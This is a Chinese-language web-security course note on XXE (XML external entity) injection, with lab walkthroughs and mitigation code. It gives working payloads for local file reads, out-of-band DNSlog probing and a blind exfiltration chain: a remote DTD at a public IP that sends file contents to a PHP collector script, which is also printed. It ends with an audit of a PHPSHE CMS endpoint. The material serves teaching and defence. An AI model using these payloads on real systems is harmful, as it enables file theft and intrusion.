059-Web攻防-XXE安全DTD实体复现源码等

059-Web攻防-XXE安全&DTD实体&复现源码等

知识点

XML&XXE-传输-原理&探针&利用&玩法

XML&XXE-黑盒-JS&黑盒测试&类型修改

XML&XXE-白盒-CMS&PHPSHE&无回显

什么是XML?

XML 被设计为传输和存储数据，XML 文档结构包括 XML 声明、DTD 文档类型定义（可

选）、文档元素，其焦点是数据的内容，其把数据从 HTML 分离，是独立于软件和硬件的

信息传输工具。等同于 JSON 传输。

XXE 漏洞 XML External Entity Injection

即 xml 外部实体注入漏洞，XXE 漏洞发生在应用程序解析 XML 输入时，没禁止外部实体

的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网扫描、攻击内网等危

害。

XML 与 HTML 的主要差异：

XML 被设计为传输和存储数据，其焦点是数据的内容。

HTML 被设计用来显示数据，其焦点是数据的外观。

HTML 旨在显示信息 ，而 XML 旨在传输存储信息。

Example：网站的 xml 文件解析

• 第一种为xml格式传输
• 第二钟常规传输
• 第三种为json传输

-XXE 黑盒发现漏洞：

1、获取得到 Content-Type 或数据类型为 xml 时，尝试 xml 语言 payload 进行测试

2、不管获取的 Content-Type 类型或数据传输类型，均可尝试修改后提交测试 xxe

3、XXE 不仅在数据传输上可能存在漏洞，同样在文件上传引用插件解析或预览也会造成

文件中的 XXE Payload 被执行

4、流量包里面对关键字进行筛选<?xml

-XXE 白盒发现：

1、可通过应用功能追踪代码定位审计

2、可通过脚本特定函数搜索定位审计

3、可通过伪协议玩法绕过相关修复等

XXE 修复防御方案：

-方案 1-禁用外部实体

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf

=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferenc

es(false);

Python：

from lxml import etreexmlData =

etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

—方案2-过滤用户提交的XML数据

过滤关键字：<!DOCTYPE 和<!ENTITY,或者 SYSTEM 和 PUBLIC

XML&XXE-传输-原理&探针&利用&玩法

参考：https://www.cnblogs.com/20175211lyz/p/11413335.html

1、读取文件：有回显

1、读取文件：
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM  "file:///d:/1.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>

简单案例

• 在本地搭建的xxe网站登录进行抓包
• 修改请求 复制粘贴上面的代码 读取我D盘下事先准备好的文件1.txt
• 读取成功
• 
• 
• 
• 

1.1、带外测试：无回显

<?xml version="1.0" ?>
<!DOCTYPE test [<!ENTITY % file SYSTEM "http://y80f9n.dnslog.cn">%file;
]>
<user><username>&send;</username><password>Mikasa</password></user>

简单案例

• 修改代码 将上面的代码复制粘贴到请求包里面
• 
• 
• 

2、外部引用实体dtd：无回显

<?xml version="1.0" ?>
<!DOCTYPE test [<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">%file;
]>
<user><username>&send;</username><password>Mikasa</password></user>evil2.dtd：
<!ENTITY send SYSTEM "file:///d:/e.txt">

简单案例

• 在本地目录下面写好我们的text.txt将后缀修改为dtd文件内容如下
• 将此文件放在www文件夹下面
• 打开登录界面进行抓包

问题：test.dtd为什么读取的是我本机上面的d盘下的1.txt而不是我虚拟机上面的

XXE 中的 file:// 是一个本地文件 URI 协议，表示访问当前操作系统本地的文件系统。

所以：文件路径是相对于“XML 解析器”运行所在的系统，而不是相对于 DTD 所在的服务器。

• 
• 让 XML 在虚拟机中被解析：让你的服务程序（比如 DVWA、Java Web 服务、PHP）在虚拟机里运行，那 XXE 攻击读取的就是虚拟机里的文件。
• 将虚拟机中的文件通过 HTTP 暴露出来<!ENTITY send SYSTEM "http://<虚拟机IP>:8081/1.txt">

3、无回显读文件

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/2.txt"> 
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>解释：
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/2.txt"> //定义一个外部实体 file，它的内容是本地 D 盘上的 2.txt 文件内容
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
//再定义一个实体 remote，告诉解析器去远程加载 test.dtd 文件。
%remote;//加载并执行 test.dtd 中的内容（这是关键，像 include 一样）
%all;//加载 test.dtd 中定义的 %all 实体（下一步会看到它的作用）。
]>
<root>&send;</root>//最终输出实体 send 的内容，它是在远程的 test.dtd 中间接定义的test.dtd：
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">
//这里定义了一个实体 %all，它的内容是再定义一个名叫 send 的实体。
这个 send 的值是一个远程 URL，它包含 %file;，也就是之前读取到的 d:/2.txt 文件内容
最终，&send; 会被替换为对这个 URL 的请求（比如 get.php?file=secret123），从而把敏感文件内容发送到攻击者服务器上。get.php<?php 
$data=$_GET['file'];
$myfile=fopen("file.txt","+w");
fwrite($myfile,$data);
fclose($myfile);
?>//这个脚本的作用是保存 XML 请求中泄露出来的文件内容[目标机器解析 XML]↓
读取 file:///d:/2.txt 成为实体 file↓
从 http://47.94.236.117/test.dtd 加载恶意 DTD↓
test.dtd 定义 send → 包含敏感文件内容的 URL↓
XML 中出现 &send; → 向攻击者网站发出请求↓
get.php 接收数据并保存为 file.txt

简单案例

• 本地目录下面创建2.txt内容如下文件里面的内容不能是中文 XML 解析器要求 URI 必须是符合标准格式的 ASCII 字符串
• 在虚拟机本地目录下面写入文件test1.txt写完修改后缀为dtd并在目录下面写入get.php文件
• 在登录页面访问抓包 将上面的代码复制到请求包里面
• 
• 
• 
• 

黑盒测试：观察数据的格式

白盒测试：处理数据的函数和框架

4、其他玩法（协议）-见参考地址

参考：https://www.cnblogs.com/20175211lyz/p/11413335.html

当无回显时我们应该想到三个问题：

• 1. 无漏洞
  2. 无回显
  3. payload有问题

XML&XXE-黑盒-JS&黑盒测试&类型修改

http://web.jarvisoj.com:9882/XXE 黑盒发现:
1、获取 Content-Type 或数据类型为 xml 时，尝试进行 xml 语言 payload 进行测试

2、不管获取的 Content-Type 类型或数据传输类型，均可尝试修改后提交测试 xxe流程:功能分析-前端提交-源码&抓包-构造 Paylod 测试更改请求数据格式:Content-Type

<?xml version="1.0" ?>
<!DOCTYPE ANY [<!ENTITY f SYSTEM "file:///d:/1.txt">
]>
<x>&f;
</x>

ML&XXE-白盒-CMS&PHPSHE&无回显

审计流程简单案例：

1. 漏洞函数simplexml_load_string用来把 XML 字符串转换成一个可以操作的对象（类似数组）**，方便你读取或处理 XML 数据

2. pe_getxml函数调用了漏洞函数右键 转到 申明和用力查看调用的地方

3. wechat_getxml调用了pe_getxml

4. notify_url 调用了wechat_getxml

5. 访问Notify_url文件 抓包 出发wechat_getxml函数，构造payload测试 无回显 使用带外

6. 先尝试读取文件，无回显后带外测试

   <?xml version="1.0" ?>
   <!DOCTYPE ANY [<!ENTITY f SYSTEM "file:///d:/1.txt">
   ]>
   <x>&f;
   </x>